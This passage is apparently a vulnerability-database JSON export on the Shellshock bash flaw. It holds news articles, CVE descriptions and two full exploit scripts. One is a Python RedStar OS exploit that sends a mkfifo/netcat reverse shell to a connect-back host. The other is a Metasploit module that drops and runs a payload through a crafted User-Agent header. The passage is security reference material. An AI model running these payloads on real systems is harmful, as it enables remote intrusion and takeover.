\n# sh: no job control in this shell \n# sh-4.1# id \n# uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:beam_t:s0-s15:c0.c1023 \n# sh-4.1# \n# \n# -- Hacker Fantastic (https://myhackerhouse.com) \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nimport subprocess \nimport requests \nimport sys \nimport os \n \ndef spawn_shell(cbport): \nsubprocess.call('nc -l ' + cbport, shell=True) \n \ndef shellshock(soft,ip,port,cbip,cbport): \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \nif soft == \"beam\": \nuser_agent = {'User-agent': '() { :; }; /bin/bash -c \"rm /tmp/.f;mkfifo /tmp/.f;cat /tmp/.f|/bin/sh -i 2>&1|nc '+cbip+' '+cbport+' >/tmp/.f\"'} \nelse: \nshellstring = '() { :; }; /bin/bash -c \"%s\"' % (cbip) \nuser_agent = {'User-agent': shellstring} \nprint \"[-] exploiting shellshock CVE-2014-6271...\" \nmyreq = requests.get(\"https://\"+ip+\":\"+port+\"/session_login.cgi\", headers = user_agent, verify=False) \n \nif __name__ == \"__main__\": \nprint \"[+] RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit\" \nif len(sys.argv) < 5: \nprint \"[-] Use with <beam> <host> <port> <connectback ip> <connectback port>\" \nprint \"[-] Or with <rssmon> <host> <port> <cmd>\" \nsys.exit() \nif(sys.argv[1]==\"beam\"): \nnewRef=os.fork() \nif newRef==0: \nshellshock(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5]) \nelse: \nspawn_shell(sys.argv[5]) \nelse: \nshellshock(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],0) \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/140205/rsshellshock.py.txt"}, {"lastseen": "2016-12-05T22:14:09", "description": "", "cvss3": {}, "published": "2014-10-03T00:00:00", "type": "packetstorm", "title": "Shellshock Bashed CGI RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2014-10-03T00:00:00", "id": 
"PACKETSTORM:128554", "href": "https://packetstormsecurity.com/files/128554/Shellshock-Bashed-CGI-RCE.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Shellshock Bashed CGI RCE', \n'Description' => %q{ \nThis module exploits the shellshock vulnerability in apache cgi. It allows you to \nexcute any metasploit payload you want. \n}, \n'Author' => \n[ \n'Stephane Chazelas', # vuln discovery \n'Fady Mohamed Osman' # Metasploit module f.othman at zinad.net \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2014-6271' ] \n], \n'Payload' => \n{ \n'BadChars' => \"\", \n}, \n'Platform' => 'linux', \n'Arch' => ARCH_X86, \n'Targets' => \n[ \n[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Aug 13 2014')) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The CGI url', '/cgi-bin/test.sh']) , \nOptString.new('FILEPATH', [true, 'The url ', '/tmp']) \n], self.class) \nend \n \ndef exploit \n@payload_name = \"#{rand_text_alpha(5)}\" \nfull_path = datastore['FILEPATH'] + '/' + @payload_name \npayload_exe = generate_payload_exe \nif payload_exe.blank? 
\nfail_with(Failure::BadConfig, \"#{peer} - Failed to generate the ELF, select a native payload\") \nend \npeer = \"#{rhost}:#{rport}\" \nprint_status(\"#{peer} - Creating payload #{full_path}\") \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => datastore['TARGETURI'], \n'agent' => \"() { :;}; /bin/bash -c \\\"\" + \"printf \" + \"\\'\" + Rex::Text.hexify(payload_exe).gsub(\"\\n\",'') + \"\\'\" + \"> #{full_path}; chmod +x #{full_path};#{full_path};rm #{full_path};\\\"\" \n}) \nend \nend`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128554/shellshock_rce.rb.txt"}], "thn": [{"lastseen": "2018-01-27T10:07:05", "description": "[](<https://4.bp.blogspot.com/-eVb9SURqAUA/VCZfla7DcDI/AAAAAAAAge4/jxEUhn1kdWY/s1600/Shellshock-Bash-Vulnerability-exploit.jpg>)\n\nResearchers on Thursday discovered a critical remotely exploitable vulnerability in the widely used command-line shell GNU Bourne Again Shell (**Bash**), dubbed \"[Shellshock](<https://thehackernews.com/2014/09/bash-shell-vulnerability-shellshock.html>)\" which affects most of the Linux distributions and servers worldwide, and may already have been exploited in the wild to take over Web servers as part of a [botnet](<https://thehackernews.com/search/label/botnet>) that is currently trying to infect other servers as well.\n\n \n**BOTNET ATTACK IN THE WILD**\n\nThe bot was discovered by the security researcher with the Twitter handle **_@yinettesys_**, who reported it on [Github](<https://gist.github.com/anonymous/929d622f3b36b00c0be1>) and said it appeared to be remotely controlled by miscreants, which indicates that the vulnerability is already being used maliciously by the hackers.\n\n \n\n\nThe vulnerability **_(CVE-2014-6271)_**, which came to light on Wednesday, affects versions 1.14 through 4.3 of GNU Bash and could become a dangerous threat to Linux/Unix and Apple users if the patches 
to BASH are not applied to the operating systems. \n\n \n\n\nPatches for the vulnerability were released, but there was some concern that the initial fix for the issue still left Bash vulnerable to attack, according to a new [US CERT](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169>) National Vulnerability Database entry. There is as of yet no official patch that completely addresses both vulnerabilities, including the second, which allows an attacker to overwrite files on the targeted system. \n \n**SHELLSHOCK vs THE INTERNET**\n\n_Robert Graham_ of _Errata Security_ observed that a major internet scan is already being used by cyber criminals to locate vulnerable servers for cyber attack. During a scan, Graham found about 3,000 servers that were vulnerable \"_just on port 80_\" \u2014 the Internet Protocol port used for normal Web Hypertext Transfer Protocol (HTTP) requests. \n\n \n\n\nThe Internet scan broke after a short while, which means that there could be a large number of other servers vulnerable to the attack.\n\n> \"_It's things like CGI scripts that are vulnerable, deep within a website (like CPanel's /cgi-sys/defaultwebpage.cgi),_\" Graham wrote in a [blog post](<http://blog.erratasec.com/2014/09/bash-shellshock-bug-is-wormable.html#.VCY8B_nSlcp>). \"_Getting just the root page is the thing least likely to be vulnerable. Spidering the site and testing well-known CGI scripts (like the CPanel one) would give a lot more results\u2014at least 10x_.\"\n\n> In addition, Graham said, \"_this thing is clearly wormable and can easily worm past firewalls and infect lots of systems. 
One key question is whether Mac OS X and iPhone DHCP service is vulnerable\u2014once the worm gets behind a firewall and runs a hostile DHCP server, that would be 'game over' for large networks._\"\n\n \n**32 ORACLE PRODUCTS VULNERABLE** \nOracle has also confirmed that over 32 of its products are affected by the \"Shellshock\" vulnerability, including some of the company's expensive integrated hardware systems. The company issued a security alert regarding the Bash bug on Friday, warning its users to wait a bit longer for the complete patch. \n\n\n> \"_Oracle is still investigating this issue and will provide fixes for affected products as soon as they have been fully tested and determined to provide effective mitigation against the vulnerability,_\" the company [said](<http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html>). \n\n**PATCH ISSUED, BUT INCOMPLETE** \nPatches were released by most of the Linux distributions, but Red Hat has updated an [advisory](<https://access.redhat.com/articles/1200223>) warning that the patch is incomplete, the same issue that was also raised by the infosec community on Twitter.\n\n> \"_Red Hat has become aware that the patches shipped for this issue are incomplete,_\" said Red Hat security engineer Huzaifa Sidhpurwala. 
\"_An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. The new issue has been assigned CVE-2014-7169._\"\n\nAlthough people are urged to apply the released patch to thwart most attacks on the affected systems, another patch is expected to be released as soon as possible.\n", "cvss3": {}, "published": "2014-09-26T20:07:00", "type": "thn", "title": "Hackers Using 'Shellshock' Bash Vulnerability to Launch Botnet Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-09-27T07:07:32", "id": "THN:491E94A14CDEFCFFF9753033F61D1E0E", "href": "https://thehackernews.com/2014/09/Shellshock-Bash-Vulnerability-exploit.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:07:04", "description": "[](<https://1.bp.blogspot.com/-VQ8KDBhjMDM/VCPBgN-AVvI/AAAAAAAAgd8/TLel5x_Xmeo/s1600/bash-shellshock.png>)\n\nA critical remotely exploitable vulnerability has been discovered in the widely used Linux and Unix command-line shell, known as **Bash**, aka the GNU **Bourne Again Shell**, leaving countless websites, servers, PCs, OS X Macs, various home routers, and many more open to cyber criminals.\n\n \n\n\nEarlier today, _Stephane Chazelas_ publicly disclosed the technical details of the [**_remote code execution_** vulnerability](<https://thehackernews.com/search/label/remote%20code%20execution>) in Bash which affects most of the Linux distributions and servers worldwide.\n\n \n\n\n**REMOTELY EXPLOITABLE SHELLSHOCK**\n\nThe vulnerability **(CVE-2014-6271)** affects versions 1.14 through 4.3 of GNU Bash and has been named **Bash Bug** and **Shellshock** by security researchers in Internet discussions. 
\n\n \n\n\nAccording to the technical details, a hacker could exploit this bash bug to execute shell commands remotely on a target machine using specially crafted variables. \u201c_In many common configurations, this vulnerability is exploitable over the network,_\u201d Stephane said.\n\n \n\n\nThis 22-year-old vulnerability stems from the way bash handles specially-formatted environment variables, namely exported shell functions. When assigning a function to a variable, trailing code in the function definition will be executed.\n\n \n\n\n**BASH BUG AFFECTS MILLIONS OF SYSTEMS**\n\nWhile bash is not directly used by remote users, it is a common shell for evaluating and executing commands from other programs, such as a web server or mail server. So if an application calls the Bash shell command via web HTTP or a _Common-Gateway Interface (CGI)_ in a way that allows a user to insert data, the web server could be hacked.\n\n \n\n\nIn simple words, if Bash has been configured as the default system shell, an attacker could launch malicious code on the server just by sending a specially crafted malicious web request by setting headers in a web request, or by setting weird MIME types. [Proof-of-concept code](<https://pastebin.com/raw.php?i=166f8Rjx>) for a cgi-bin reverse shell has been posted on the Internet.\n\n> Similar attacks are possible via OpenSSH, \u201c_We have also verified that this vulnerability is exposed in ssh\u2014but only to authenticated sessions. Web applications like cgi-scripts may be vulnerable based on a number of factors; including calling other applications through a shell, or evaluating sections of code through a shell_.\u201d Stephane warned. 
But if an attacker does not have an SSH account this exploit would not work.\n\nThis is a serious risk to Internet infrastructure, just like the Heartbleed bug, because Linux runs not only the majority of servers but also a large number of embedded devices, and Mac OS X laptops and Android devices are also running the vulnerable version of the bash software. The NIST [vulnerability database](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271>) has rated this vulnerability \u201c_10 out of 10_\u201d in terms of severity.\n\n \n\n\n**HOW TO CHECK FOR VULNERABLE SHELL**\n\nTo determine if a Linux or Unix system is vulnerable, run the following commands in your Linux shell:\n\n> * env X=\"() { :;} ; echo shellshock\" /bin/sh -c \"echo completed\"\n> * env X=\"() { :;} ; echo shellshock\" `which bash` -c \"echo completed\"\n\nIf you see the word \"_shellshock_\" in the output, errrrr\u2026 then you are at risk.\n\n \n\n\n**BASH BUG PATCH**\n\nIt is recommended to disable any CGI scripts that call on the shell, but this does not fully mitigate the vulnerability. 
Many of the major operating system and Linux distribution vendors have released new bash software versions today, including:\n\n \n\n\n * Red Hat Enterprise Linux (versions 4 through 7) and the Fedora distribution\n * [CentOS](<http://lists.centos.org/pipermail/centos/2014-September/146099.html>) (versions 5 through 7)\n * [Ubuntu](<https://www.ubuntu.com/usn/usn-2362-1/>) 10.04 LTS, 12.04 LTS, and 14.04 LTS\n * [Debian](<https://lists.debian.org/debian-security-announce/2014/msg00220.html>)\n\nIf your system is vulnerable to the bash bug, then you are strongly advised to upgrade your bash software package as soon as possible.\n", "cvss3": {}, "published": "2014-09-24T20:19:00", "type": "thn", "title": "Remotely Exploitable 'Bash Shell' Vulnerability Affects Linux, Unix and Apple Mac OS X", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6271"], "modified": "2014-09-25T07:19:29", "id": "THN:1859301C4A1DFB7CAC529CC0D8AA84DD", "href": "https://thehackernews.com/2014/09/bash-shell-vulnerability-shellshock.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "attackerkb": [{"lastseen": "2023-10-01T09:52:28", "description": "GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2014-09-25T00:00:00", "type": "attackerkb", "title": "CVE-2014-7169", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2020-06-05T00:00:00", "id": "AKB:D0ACE522-D43F-4688-92FE-CFF1799B4890", "href": "https://attackerkb.com/topics/GF2Rtrz9n4/cve-2014-7169", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-01T09:33:35", "description": "GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized memory access, and untrusted-pointer read and write operations) via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by 
unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271 and CVE-2014-7169.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2014-09-27T00:00:00", "type": "attackerkb", "title": "CVE-2014-6277", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-7169"], "modified": "2020-06-05T00:00:00", "id": "AKB:26BDFAC3-8C29-40D1-B3A7-C26249A3B4D7", "href": "https://attackerkb.com/topics/Sj4QBtPdUu/cve-2014-6277", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-01T09:52:56", "description": "GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and 
mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka \u201cShellShock.\u201d NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.\n\n \n**Recent assessments:** \n \n**h00die-gr3y** at May 21, 2023 3:28pm UTC reported:\n\nA `Golden Oldie` from 2014 that is still very relevant nowadays.\n\nIn my recent research of security vulnerabilities, I bumped into several targets that were still vulnerable to [CVE-2014-6271](<https://nvd.nist.gov/vuln/detail/CVE-2014-6271>) a.k.a. `Shellshock` and [CVE-2014-6278](<https://nvd.nist.gov/vuln/detail/CVE-2014-6278>). You should not be surprised that most of these targets are IoT based with an embedded Linux/Unix image running a vulnerable `bash` version. They typically do not get updated at all and are easy targets for a malicious actor to fi